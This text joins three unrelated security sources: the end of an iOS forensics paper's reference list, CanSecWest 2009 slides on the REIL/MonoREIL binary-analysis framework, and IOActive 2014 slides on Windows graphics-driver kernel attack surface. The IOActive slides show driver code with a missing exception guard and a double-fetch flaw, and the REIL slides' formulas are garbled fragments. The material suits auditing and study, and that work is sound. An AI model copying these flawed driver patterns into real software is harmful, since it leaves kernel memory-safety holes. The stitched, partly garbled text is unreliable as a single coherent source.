How did Scarlett Johansson ’s phone get hacked?. http://gizmodo.com/
5841742/how-did-scarlett-johanssons-phone-get-hacked .
How the NSA cracked the web. http://www.newyorker.com/online/blogs/
elements/2013/09/the-nsa-versus-encryption.html .
How the NSA spies on smartphones including the BlackBerry. Der Spiegel.
http://www.spiegel.de/international/world/how-the-nsa-spies-on-smartphones-including-the-blackberry-a-921161.html .
How to maintain VOIP socket connection in background. http://
stackover flow.com/questions/5987495/how-to-maintain-voip-
socket-connection-in-background .
How: Gameboy Emulator finding it ’s way onto non-jailbroken devices.
http://www.imore.com/how-gameboy-emulator- finding-its-way-
non-jailbroken-devices .
iMessage privacy. http://blog.quarkslab.com/imessage-privacy.html .
iOS 7 and business. http://www.apple.com/ios/business/ .
iPhone users are all zombies. http://www.theregister.co.uk/2013/09/09/
fanbois_the_nsa_thinks_youre_all_zombies/ .
Lau Billy, Yeongjim Jang, Chengyu Song, Tielei Wang, Pak ho Chung, Royal
Paul. Mactans: injecting malware into iOS devices via malicious
chargers. In: Black Hat 2013. Georgia Institute of Technology. https://
media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-
into-iOS-Devices-via-Malicious-Chargers-WP.pdf .
Miller Charlie, Blazakis Dion, Zovi Dino Dai, Esser Stefan, Iozzo Vincenzo,
Weinmann Ralf-Phillip. iOS hacker ’s handbook. Wiley. ISBN 978-
1118204122.J. Zdziarski / Digital Investigation 11 (2014) 3 –19 18
Mozilla toughens up on CA abuse. http://news.techworld.com/security/
3427196/mozilla-toughens-up-on-ca-certi ficate-abuse/ .
NSA spies reportedly exploited iPhone location bug. http://arstechnica.
com/security/2013/09/nsa-spies-reportedly-exploited-iphone-
location-bug-not- fixed-until-2011/ .
Privacy scandal: NSA can spy on smart phone data. Der Spiegel. http://
www.spiegel.de/international/world/privacy-scandal-nsa-can-spy-on-smart-phone-data-a-920971.html ; September 7; 2013.
Renard Mathieu. Hacking Apple accessories to pown iDevices. Sogeti. http://
www.ossir.org/paris/supports/2013/2013-07-09/ipown-redux.pdf .
Seriot Nicolas. iPhone privacy. http://seriot.ch/blog.php?article 1⁄420091203 ;
2010.The iOS MDM protocol. http://media.blackhat.com/bh-us-11/Schuetz/BH_
US_11_Schuetz_InsideAppleMDM_WP.pdf .
The iPhone wiki. http://www.theiphonewiki.com .
Usbmux. http://theiphonewiki.com/wiki/Usbmux .
Usbmuxd. http://theiphonewiki.com/wiki/Usbmux .
xpwntool. http://theiphonewiki.com/wiki/Xpwntool .
Zdziarski. iOS forensic investigative methods. http://www.zdziarski.com/
blog/?p 1⁄42287 .
Zdziarski Jonathan, Media O ’Reilly. iPhone forensics. ISBN 978-
0596153588.J. Zdziarski / Digital Investigation 11 (2014) 3 –19 19Platform -independent static 
binary code analysis using a meta -
assembly language
Thomas Dullien, Sebastian Porst
zynamics GmbH
CanSecWest 2009
Overview
2The REIL Language
Abstract Interpretation
MonoREIL
Results
Motivation
•Bugs are getting harder to find
•Defensive side (most notably Microsoft) has 
invested a lot of money in a „bugocide“
•Concerted effort: Lots of manual code auditing 
aided by static analysis tools
•Phoenix RDK: Includes „lattice based“ analysis 
framework to allow pluggable abstract 
interpretation in the compiler
3
Motivation
•Offense needs automated tools if they want to 
avoid being sidelined
•Offensive static analysis: Depth vs. Breadth
•Offense has no source code, no Phoenix RDK, 
and should not depend on Microsoft
•We want a static analysis framework for 
offensive purposes
4
Overview
5The REIL Language
Abstract Interpretation
MonoREIL
Results
REIL
•Reverse Engineering Intermediate Language
•Platform -Independent meta -assembly language
•Specifically made for static code analysis of 
binary files
•Can be recovered from arbitrary native 
assembly code
–Supported so far: x86, PowerPC, ARM
6
Advantages of REIL
•Very small instruction set (17 instructions)
•Instructions are very simple
•Operands are very simple
•Free of side -effects
•Analysis algorithms can be written in a 
platform -independent way
–Great for security researchers working on more 
than one platform
7
Creation of REIL code
•Input: Disassembled Function
–x86, ARM, PowerPC, potentially others
•Each native assembly instruction is translated to 
one or more REIL instructions
•Output: The original function in REIL code
8
Example
9

Design Criteria
•Simplicity
•Small number of instructions
–Simplifies abstract interpretation (more later)
•Explicit flag modeling
–Simplifies reasoning about control -flow
•Explicit load and store instructions
•No side -effects
10
REIL Instructions
•One Address
–Source Address * 0x100 + n
–Easy to map REIL instructions back to input code
•One Mnemonic
•Three Operands
–Always
•An arbitrary amount of meta -data
–Nearly unused at this point
11
REIL Operands
•All operands are typed
–Can be either registers, literals, or sub -addresses
–No complex expressions
•All operands have a size
–1 byte, 2 bytes, 4 bytes, ...
12
The REIL Instruction Set
•Arithmetic Instructions
–ADD, SUB, MUL, DIV, MOD, BSH
•Bitwise Instructions
–AND, OR, XOR
•Data Transfer Instructions
–LDM, STM, STR
13
The REIL Instruction Set
•Conditional Instructions
–BISZ, JCC
•Other Instructions
–NOP , UNDEF, UNKN
•Instruction set is easily extensible
14
REIL Architecture
•Register Machine
–Unlimited number of registers t0, t1, ...
–No explicit stack
•Simulated Memory
–Infinite storage
–Automatically assumes endianness of the source 
platform
15
Limitations of REIL
•Does not support certain instructions (FPU, 
MMX, Ring -0, ...) yet
•Can not handle exceptions in a platform -
independent way
•Can not handle self -modifying code
•Does not correctly deal with memory selectors
16
Overview
17The REIL Language
Abstract Interpretation
MonoREIL
Results
Abstract Interpretation
•Theoretical background for most code analysis
•Developed by Patrick and Rhadia Cousot around 
1975 -1977
•Formalizes „static abstract reasoning about 
dynamic properties“
•Huh ?
•A lot of the literature is a bit dense for many 
security practitioners
18
Abstract Interpretation
•We want to make statements about programs
•Example: Possible set of values for variable x at 
a given program point p
•In essence: For each point p, we want to find
•Problem:                 is a bit unwieldly
•Problem: Many questions are undecidable 
(where is the w*nker that yells „halting 
problem“) ?
19
) (StatesP Kp
) (StatesP
Dealing with unwieldy stuff
•Reason about something simpler:
•Example: Values vs. Intervals
20
) (StatesP
) (StatesP
D
DAbstraction
Concretisation
Lattices
•In order for this to work,     must be structurally 
similar to
• supports intersection and union
•You can check for inclusion (contains, does not 
contain)
•You have an empty set (bottom) and 
„everything“ (top)
21
) (StatesP
) (StatesP
D
Lattices
•A lattice is something like a generalized 
powerset
•Example lattices: Intervals, Signs,                    , 
mod p 
22
) Registers(P
Dealing with halting
•Original program consists of p1... pnprogram 
points
•Each instruction transforms a set of states into a 
different set of states
•p1... pnare mappings
•Specify 
•This yields us
23
) ( ) ( StatesP StatesP
D Dp pn
:' '1
n nD Dp
:~
Dealing with halting
•We cheat: Let    be finite  is finite
•Make sure that     is monotonous (like this talk)
•Begin with initial state I
•Calculate 
•Calculate 
•Eventually, you reach 
•You are done –read off the results and see if 
your question is answered
24
)(~lp
))(~(~lpp
)(~)(~ 1l plpn n
p~
D
nD
Theory vs. practice
•A lot of the academic focus is on proving 
correctness of the transforms
•As practitioner we know that piis probably not 
fully correctly specified
•We care much more about choosing and 
constructing a     so that we get the results we need
25
) (StatesP
) (StatesP
D
D
ip
'ip
D
Overview
26The REIL Language
Abstract Interpretation
MonoREIL
Results
MonoREIL
•You want to do static analysis
•You do not want to write a full abstract 
interpretation framework
•We provide one: MonoREIL
•A simple -to-use abstract interpretation 
framework based on REIL
27
What does it do ?
•You give it
–The control flow graph of a function (2 LOC)
–A way to walk through the CFG (1 + n LOC)
–The lattice     (15 + n LOC)
•Lattice Elements
•A way to combine lattice elements
–The initial state (12 + n LOC)
–Effects of REIL instructions on      (50 + n LOC)
28
D
D
How does it work?
•Fixed -point iteration until final state is found
•Interpretation of result
–Map results back to original assembly code
•Implementation of MonoREIL already exists
•Usable from Java, ECMAScript, Python, Ruby
29
Overview
30The REIL Language
Abstract Interpretation
MonoREIL
Results
Register Tracking
•First Example: Simple
•Question: What are the effects of a register on 
other instructions?
•Useful for following register values
31
Register Tracking
•Demo
32
Register Tracking
•Lattice: For each instruction, set of influenced 
registers, combine with union
•Initial State
–Empty (nearly) everywhere
–Start instruction: { tracked register }
•Transformations for MNEM op1, op2, op3
–If op1 or op2 are tracked op3 is tracked too
–Otherwise: op3 is removed from set
33
Negative indexing
•Second Example: More complicated
•Question: Is this function indexing into an array 
with a negative value ?
•This gets a bit more involved
34
Negative indexing
•Simple intervals alone do not help us much
•How would you model a situation where
–A function gets a structure pointer as argument
–The function retrieves a pointer to an array from an 
array of pointers in the structure
–The function then indexes negatively into this array
•Uh. Ok. 
35
Abstract locations
•For each instruction, what are the contents of the 
registers ? Let‘s slowly build complexity:
•If eax contains arg_4, how could this be modelled ?
–eax = *(esp.in + 8)
•If eax contains arg_4 + 4 ?
–eax = *(esp.in + 8) + 4 
•If eax can contain arg_4+4, arg_4+8, arg_4+16, 
arg_4 + 20 ?
–eax = *(esp.in + 8) + [4, 20]
36
Abstract locations
•If eax can contain arg_4+4, arg_8+16 ?
–eax = *(esp.in + [8,12]) + [4,16]
•If eax can contain any element from 
–arg_4mem[0] to arg_4 mem[10], incremented 
once, how do we model this ?
–eax = *(*(esp.in + [8,8]) + [4, 44]) + [1,1]
•OK. An abstract location is a base value and a 
list of intervals, each denoting memory 
dereferences (except the last)
37
Range Tracking
38eax.in + [a, b] + [0, 0]
eax.in + a eax.in + b
Range Tracking
39eax + [a, b] + [c, d] + [0, 0]
[eax+a]+c [eax+a]+d [eax+a+4]+c [eax+a+4]+d [eax+b]+c [eax+b]+deax + a eax + b
Range Tracking
•Lattice: For each instruction, a map:
•Initial State
–Empty (nearly) everywhere
–Start instruction: { reg -> reg.in + [0,0] }
•Transformations 
–Complicated. Next slide. 
40
 Aloc Aloc Register

Range Tracking
•Transformations 
–ADD/SUB are simple: Operate on last intervals
–STM op1, , op3
•If op1or op3not in our input map M skip
•Otherwise, M[ M[op3] ] = op1
–LDM op1, , op3
•If op1or op3is not in our input map M skip
•M[ op3] = M[ op1]
–Others: Case -specific hacks
41
Range Tracking
•Where is the meat ?
•Real world example: Find negative array 
indexing 
42
MS08 -67
•Function takes in argument to a buffer
•Function performs complex pointer arithmetic
•Attacker can make this pointer arithmetic go 
bad
•The pointer to the target buffer of a wcscpy will 
be decremented beyond the beginning of the 
buffer
43
MS08 -67
•Michael Howard‘s Blog:
–“In my opinion, hand reviewing this code and 
successfully finding this bug would require a great deal 
of skill and luck. So what about tools?  It's very difficult 
to design an algorithm which can analyze C or C++ code 
for these sorts of errors.  The possible variable states 
grows very, very quickly.  It's even more difficult to take 
such algorithms and scale them to non -trivial code 
bases. This is made more complex as the function 
accepts a highly variable argument, it's not like the 
argument is the value 1, 2 or 3! Our present toolset 
does not catch this bug.”
44
MS08 -67
•Michael is correct
–He has to defend all of Windows
–His „regular“ developers have to live with the 
results of the automated tools
–His computational costs for an analysis are gigantic
–His developers have low tolerance for false positives
45
MS08 -67
•Attackers might have it easier
–They usually have a much smaller target 
–They are highly motivated: I will tolerate 100 false 
positives for each „real“ bug
•I can work through 20 -50 a day
•A week for a bug is still worth it
–False positive reduction is nice, but if I have to read 
100 functions instead of 20000, I have already 
gained something
46
MS08 -67
•Demo
47
Limitations and assumptions
•Limitations and assumptions
–The presented analysis does not deal with aliasing
–We make no claims about soundness
–We do not use conditional control -flow information
–We are still wrestling with calling convention issues
–The important bit is not our analysis itself –the 
important part is MonoREIL
–Analysis algorithms will improve over time –laying  
the foundations was the boring part
48
Status
•Abstract interpretation framework available in 
BinNavi
•Currently x86
•In April (two weeks !): PPC and ARM 
–Was only a matter of adding REIL translators
•Some example analyses:
–Register tracking (lame, but useful !)
–Negative array indexing (less lame, also useful !)
49
Outlook
•Deobfuscation through optimizing REIL
•More precise and better static analysis
•Register tracking etc. release in April (two 
weeks !)
•Negative array indexing etc. release in October
•Attempting to encourage others to build their 
own lattices
50
Related work ?
•Julien Vanegue / ERESI team (EKOPARTY)
•Tyler Durden‘s Phrack 64 article
•Principles of Program Analysis 
(Nielson/Nielson/Hankin)
•University of Wisconsin WISA project
•Possibly related: GrammaTech CodeSurfer x86
51
Questions ?
52
( Good Bye, Canada )IOActive, Inc. Copyright 2014.  All Rights Reserved. 
Windows Kernel Graphics Driver Attack Surface Ilja van Sprundel      Director of Penetration Testing  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Who Am I ? • Ilja van Sprundel  • ivansprundel@ioactive.com • Director of Penetration Testing at IOActive  • Pen test • Code review • Break stuff for fun and profit   
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Outline/Agenda  • What’s this talk about ? • Windows graphics drivers • WDDM kmd Driver – Synchronization – Entrypoints • Full userland program to talk about this stuff • Sniffing/snooping private data  • Putting it all together – Fuzzing  – Reverse engineering 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
What’s This Talk About ?  • Windows® WDDM drivers – Implementation security  – Kernel driver part  • Audience – Auditors (what to look for)  – Graphics drivers developers   (what not to do, and where to pay close attention) – Curious people that like to poke around in driver internals • Knowledge  – Some basic knowledge of Windows drivers (IRP’s, probing, capturing, ...) 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Windows Graphics Drivers • Old Model – XDDM /XPDM – Windows 2000/XP – No longer supported as of Windows 8 – Not covered in this presentation • WDDM (Windows Display Driver Model) – New Vista model  • v1 – vista • v1.1 – win 7 • v1.2 – win 8 • V1.3 – win 8.1 – Will only describe interesting parts from a security perspective  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Windows Graphics Drivers • So who makes these things and why ?  – IHV’s (Intel, NVIDIA, AMD, Qualcomm, PowerVR, VIA, Matrox, ...)  • Very rich drivers  – Basic fallback (basic render, basic display) • Implements the bare minimum  – Virtualization (VMware, Virtual Box, Parallels guest drivers)  • Specific special purpose driver  – Remote desktop scenario’s (XenDesktop, RDP, ...)  • Specific special purpose driver  – Virtual display (intelligraphics, extramon, ...)  • Specific special purpose driver  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Windows Graphics Drivers • WDDM model is split between user mode and kernel mode  • Move to user was done for stability and reliability  – A large chunk of all blue screens prior to vista were due to graphics drivers (from MSDN): “In Windows XP, display drivers, which are large and complex, can be a major source of system instability. These drivers execute entirely in kernel mode (i.e., deep in the system code) and hence a single problem in the driver will often force the entire system to reboot. According to the crash analysis data collected during the Windows XP timeframe, display drivers are responsible for up to 20 percent of all blue screens.”  • User mode part runs as part of a dll in most processes – Still has interesting attack surface  • Encoders / decoders  • Binary planting  • Some API’s might be partially (and indirectly) exposed to remote attack surface (e.g. WebGL) • Will not cover user mode part, only kernel mode.  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver • So what does a WDDM kmd driver look like?  NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject,                          IN PUNICODE_STRING RegistryPath ) { ...  DRIVER_INITIALIZATION_DATA DriverInitializationData; ...  DriverInitializationData.DxgkDdiEscape = DDIEscape; ...     Status = DxgkInitialize(DriverObject,                             RegistryPath,                             &DriverInitializationData); ... } 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver • DriverEntry() is the main entry point for any kernel driver • Fill in DRIVER_INITIALIZATION_DATA  struct  – Contains a large set of callback functions  – ‘dynamic’ struct  • Bigger on win7 (vs vista)  • Even bigger on win8  • Grown even more for win 8.1  • All later elements appended at the end • Call DxgkInitialize() – Tells dxgkernel about this driver and all its callbacks  • No IRP’s, no IOCTL’s, nothing like WDM. You don’t pass the IoManager. 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver • Very similar variant of this  • Calls DxgkInitializeDisplayOnlyDriver() iso DxgkInitialize() instead  • Uses PKMDDOD_INITIALIZATION_DATA structure • Much like the previous, but for use by a kernel mode display only driver 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver • DRIVER_INITIALIZATION_DATA contains all sorts of callbacks  • From an attack surface perspective, we can roughly divide them into three groups: – Those where an attacker has no or very little control  – Those where an attacker has some (indirect) control  – Those where an attacker has significant input into the callback • We’re obviously mainly concerned with the latter  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Synchronization • WDDM has a threading model for these callbacks which basically consists of four levels (where each callback belongs to one of these):  • Three – Only a single thread may enter – GPU Has to be idle  – No DMA buffers being processed  – Video memory is evicted to host CPU memory  • Two – Same as three except for video memory eviction 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Synchronization • One  – Calls are categorized into classes. Only one thread of each class is allowed to call into callback simultaneously • Zero – Completely reentrant • If concurrency is allowed, no two concurrent threads may belong to the same process.  • This is important to know, since you need to keep this in mind when looking for potential race conditions scenarios. 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints • A fairly small number of the callbacks take significant input from userland:  – Escape  – Render  – Allocation  – QueryAdapter  • Before we can get to them, we need to perform proper driver initialization – Look at this first  • Then look at the callbacks  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Initialization • Need to initialize the device before entry points can be reached from userland  • Assume we come from the GDI world and we have an HDC  • Succinctly, this involves three steps:  – Convert HDC to WDDM adapter handle  – Get a WDDM device handle out of the adapter handle  – Create a context for the device   
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Initialization – Convert HDC to adapter handle – Fill in the D3DKMT_OPENADAPTERFROMHDC data structure  – Call D3DKMTOpenAdapterFromHdc D3DKMT_OPENADAPTERFROMHDC oafh;  memset(&oafh, 0x00, sizeof(oafh)); oafh.hDc = GetDC(NULL); D3DKMTOpenAdapterFromHdc(&oafh);  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Initialization – Get a device handle out of the adapter handle – Fill in D3DKMT_CREATEDEVICE data structure – Call D3DKMTCreateDevice  D3DKMT_CREATEDEVICE cdev; memset(&cdev, 0x00, sizeof(cctx)); cdev.hAdapter = oafh.hAdapter; D3DKMTCreateDevice(&cdev); 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Initialization – Create a context for the device – The previously obtained device handle is the handle that gets passed to most  userland API’s to talk to WDDM drivers.  – In order to do anything, you’ll need to create a device context for the device • Sets up stuff like command buffers that can be passed off to a WDDM driver  • There is some attack surface here. Allows passing arbitrary userland data (pPrivateDriverData)  (with associated length, PrivateDriverDataSize) to WDDM driver.  – It may or may not look at it. This is completely driver dependent.     
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Initialization – Create a context for the device – Fill in  D3DKMT_CREATECONTEXT data structure – Call D3DKMTCreateContext  
– DxgkDdiCreateContext kernel entry point    D3DKMT_CREATECONTEXT cctx; memset(&cctx, 0x00, sizeof(cctx)); cctx.hDevice = cdev.hDevice; r = pfnKTCreateContext(&cctx); typedef struct _D3DKMT_CREATECONTEXT { D3DKMT_HANDLE             hDevice; UINT                      NodeOrdinal; UINT                      EngineAffinity; D3DDDI_CREATECONTEXTFLAGS Flags; VOID                      *pPrivateDriverData; UINT                      PrivateDriverDataSize; D3DKMT_CLIENTHINT         ClientHint; D3DKMT_HANDLE             hContext; VOID                      *pCommandBuffer; UINT                      CommandBufferSize; D3DDDI_ALLOCATIONLIST     *pAllocationList; UINT                      AllocationListSize; D3DDDI_PATCHLOCATIONLIST  *pPatchLocationList; UINT                      PatchLocationListSize; D3DGPU_VIRTUAL_ADDRESS    CommandBuffer;  } D3DKMT_CREATECONTEXT; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Initialization – Create a context for the device – Some interesting output elements in struct  – Both command buffer and patchlocationlist get allocated on your behalf by WDDM  – In usermode. Used to talk to WDDM driver.      typedef struct _D3DKMT_CREATECONTEXT { D3DKMT_HANDLE             hDevice; UINT                      NodeOrdinal; UINT                      EngineAffinity; D3DDDI_CREATECONTEXTFLAGS Flags; VOID                      *pPrivateDriverData; UINT                      PrivateDriverDataSize; D3DKMT_CLIENTHINT         ClientHint; D3DKMT_HANDLE             hContext; VOID                      *pCommandBuffer; UINT                      CommandBufferSize; D3DDDI_ALLOCATIONLIST     *pAllocationList; UINT                      AllocationListSize; D3DDDI_PATCHLOCATIONLIST  *pPatchLocationList; UINT                      PatchLocationListSize; D3DGPU_VIRTUAL_ADDRESS    CommandBuffer;  } D3DKMT_CREATECONTEXT; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Escape • DxgkDdiEscape  • This is the IOCTL of graphics drivers. • Very much like the ‘old’ extEscape • However, no escape function is passed.  • Just a pointer to private data and a length value • MSDN describes it as “The DxgkDdiEscape function shares information with the user-mode display driver.”  • Driver is free to implement this any way it sees fit.  • Data isn’t structured in any standardized way. – Can and will vary wildly from driver to driver. • Threading level 2 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Escape • What does DxgkDdiEscape look like?  NTSTATUS APIENTRY DxgkDdiEscape(   __in  const HANDLE hAdapter,   __in  const DXGKARG_ESCAPE *pEscape ) { ... }  typedef struct _DXGKARG_ESCAPE {   HANDLE             hDevice;   D3DDDI_ESCAPEFLAGS Flags;   VOID               *pPrivateDriverData;   UINT               PrivateDriverDataSize;   HANDLE             hContext; } DXGKARG_ESCAPE; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Escape • pPrivateDriverData is probed and captured  • No length restrictions (e.g. could be ~4 gigs) • Userland has complete control of its content  • Any embedded pointers in it need to be probed and only used under a  try/except  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Escape • How do you talk to this from userland? 
• Publicly documented function. Basically exposes a system call.  NTSTATUS D3DKMTEscape( _In_  const D3DKMT_ESCAPE *pData ); typedef struct _D3DKMT_ESCAPE { D3DKMT_HANDLE      hAdapter; D3DKMT_HANDLE      hDevice; D3DKMT_ESCAPETYPE  Type; D3DDDI_ESCAPEFLAGS Flags; VOID               *pPrivateDriverData; UINT               PrivateDriverDataSize; D3DKMT_HANDLE      hContext;  } D3DKMT_ESCAPE; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Escape 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • DxgkDdiRender • This callback is at the heart of rendering.  • Allows usermode to tell GPU to render from a command buffer – Will generate DMA buffer from command buffer   
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • What does DxgkDdiRender look like? NTSTATUS APIENTRY DxgkDdiRender(   _In_     const HANDLE hContext,   _Inout_  DXGKARG_RENDER *pRender ) { ... } typedef struct _DXGKARG_RENDER {  const VOID CONST         *pCommand;  const UINT               CommandLength;  VOID                     *pDmaBuffer;  UINT                     DmaSize;  VOID                     *pDmaBufferPrivateData;  UINT                     DmaBufferPrivateDataSize;  DXGK_ALLOCATIONLIST      *pAllocationList;  UINT                     AllocationListSize;  D3DDDI_PATCHLOCATIONLIST *pPatchLocationListIn; UINT                     PatchLocationListInSize;  D3DDDI_PATCHLOCATIONLIST *pPatchLocationListOut; UINT                     PatchLocationListOutSize;  UINT                     MultipassOffset;  UINT                     DmaBufferSegmentId;  PHYSICAL_ADDRESS         DmaBufferPhysicalAddress;  } DXGKARG_RENDER; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • pCommand buffer is a pointer that comes from userland  • pPatchLocationListIn is a pointer that comes from userland • MSDN says the following about these:  “Both the command buffer pCommand and the input patch-location list pPatchLocationListIn that the user-mode display driver generates are allocated from the user-mode address space and are passed to the display miniport driver untouched. The display miniport driver must use __try/__except code on any access to the buffer and list and must validate the content of the buffer and list before copying the content to the respective kernel buffers.” • It goes on to give a validation sample. 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render __try   {     for (Index = 0; Index < AllocationListInSize; AllocationTable++,             AllocationListIn++, AllocationListOut++, Index++)      {       D3DKMT_HANDLE AllocationHandle = AllocationListIn->hAllocation;       . . .     }   } __except(EXCEPTION_EXECUTE_HANDLER)   {     Status = STATUS_INVALID_PARAMETER;     SAMPLE_LOG_ERROR(  "Exception occurred accessing ... Status=0x%I64x", Status);     goto cleanup;   } 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • Userland doesn’t actually get to specify the command buffer and patch list addresses.  • Dxgkernel allocates them on your behalf when you call D3DKMTCreateContext, but does map it in userland.  • So you can unmap it (VirtualFree), behind the drivers back.  • Hence, why the try/except is needed.  • Given that both command and patch list addresses are in userland you need to watch out for double fetches.  – Fetch one: dereference and validate – Userland changes data   – Fetch two: dereference and use, double fetch bug, invalidates previous validation 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • Example of missing try /except static NTSTATUS APIENTRY DxgkDdiRenderNew( CONST HANDLE  hContext, DXGKARG_RENDER  *pRender) {     if (pRender->CommandLength < sizeof (VBOXWDDM_DMA_PRIVATEDATA_BASEHDR))     {         return STATUS_INVALID_PARAMETER;     }      PVBOXWDDM_DMA_PRIVATEDATA_BASEHDR pInputHdr = (PVBOXWDDM_DMA_PRIVATEDATA_BASEHDR)pRender->pCommand;     NTSTATUS Status = STATUS_SUCCESS; VBOXCMDVBVA_HDR* pCmd = (VBOXCMDVBVA_HDR*)pRender->pDmaBufferPrivateData; switch (pInputHdr->enmCmd)  no try/except.      { ...     } ...     return STATUS_SUCCESS; } 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • Example of double fetch  static NTSTATUS APIENTRY DxgkDdiRenderNew( CONST HANDLE  hContext, DXGKARG_RENDER  *pRender) { ...     PVBOXWDDM_DMA_PRIVATEDATA_BASEHDR pInputHdr = (PVBOXWDDM_DMA_PRIVATEDATA_BASEHDR)pRender->pCommand; ...  PVBOXWDDM_DMA_PRIVATEDATA_UM_CHROMIUM_CMD pUmCmd = pInputHdr; ...  PVBOXWDDM_UHGSMI_BUFFER_UI_SUBMIT_INFO pSubmUmInfo = pUmCmd->aBufInfos; ...  if (pSubmUmInfo->offData >= pAlloc->AllocData.SurfDesc.cbSize                         || pSubmUmInfo->cbData > pAlloc->AllocData.SurfDesc.cbSize                         || pSubmUmInfo->offData + pSubmUmInfo->cbData > pAlloc->AllocData.SurfDesc.cbSize)                 {                     WARN(("invalid data"));                     return STATUS_INVALID_PARAMETER;                 } ...  pSubmInfo->cbBuffer = pSubmUmInfo->cbData; ...     return STATUS_SUCCESS; } Validate 
Use 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render • How do you talk to this from userland? 
 NTSTATUS APIENTRY D3DKMTRender( _Inout_  D3DKMT_RENDER *pData ); typedef struct _D3DKMT_RENDER {   union {     D3DKMT_HANDLE hDevice;     D3DKMT_HANDLE hContext;   };   UINT                     CommandOffset;   UINT                     CommandLength;   UINT                     AllocationCount;   UINT                     PatchLocationCount;   VOID                     *pNewCommandBuffer;   UINT                     NewCommandBufferSize;   D3DDDI_ALLOCATIONLIST    *pNewAllocationList;   UINT                     NewAllocationListSize;   D3DDDI_PATCHLOCATIONLIST *pNewPatchLocationList;   UINT                     NewPatchLocationListSize;   D3DKMT_RENDERFLAGS       Flags;   ULONGLONG                PresentHistoryToken;   ULONG                    BroadcastContextCount;   D3DKMT_HANDLE            BroadcastContext[D3DDDI_MAX_BROADCAST_CONTEXT];   ULONG                    QueuedBufferCount;   D3DGPU_VIRTUAL_ADDRESS   NewCommandBuffer;   VOID                     *pPrivateDriverData;   UINT                     PrivateDriverDataSize; } D3DKMT_RENDER; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Render 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Allocation • DxgkDdiCreateAllocation • Dxgkernel calls this callback on userland’s behalf to allocate memory.  • It will allocate either system or video memory, depending on flags. 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Allocation • What does DxgkDdiCreateAllocation look like?  NTSTATUS APIENTRY DxgkDdiCreateAllocation(   const HANDLE hAdapter,   DXGKARG_CREATEALLOCATION *pCreateAllocation ) { ... } typedef struct _DXGKARG_CREATEALLOCATION {   const VOID                 *pPrivateDriverData;   UINT                       PrivateDriverDataSize;   UINT                       NumAllocations;   DXGK_ALLOCATIONINFO        *pAllocationInfo;   HANDLE                     hResource;   DXGK_CREATEALLOCATIONFLAGS Flags; } DXGKARG_CREATEALLOCATION; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Allocation • What does DxgkDdiCreateAllocation look like ? (cont.) typedef struct _DXGK_ALLOCATIONINFO {   VOID                       *pPrivateDriverData;   UINT                       PrivateDriverDataSize;   UINT                       Alignment;   SIZE_T                     Size;   SIZE_T                     PitchAlignedSize;   DXGK_SEGMENTBANKPREFERENCE HintedBank;   DXGK_SEGMENTPREFERENCE     PreferredSegment;   UINT                       SupportedReadSegmentSet;   UINT                       SupportedWriteSegmentSet;   UINT                       EvictionSegmentSet;   UINT                       MaximumRenamingListLength;   HANDLE                     hAllocation;   DXGK_ALLOCATIONINFOFLAGS   Flags;   DXGK_ALLOCATIONUSAGEHINT   *pAllocationUsageHint;   UINT                       AllocationPriority; } DXGK_ALLOCATIONINFO; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
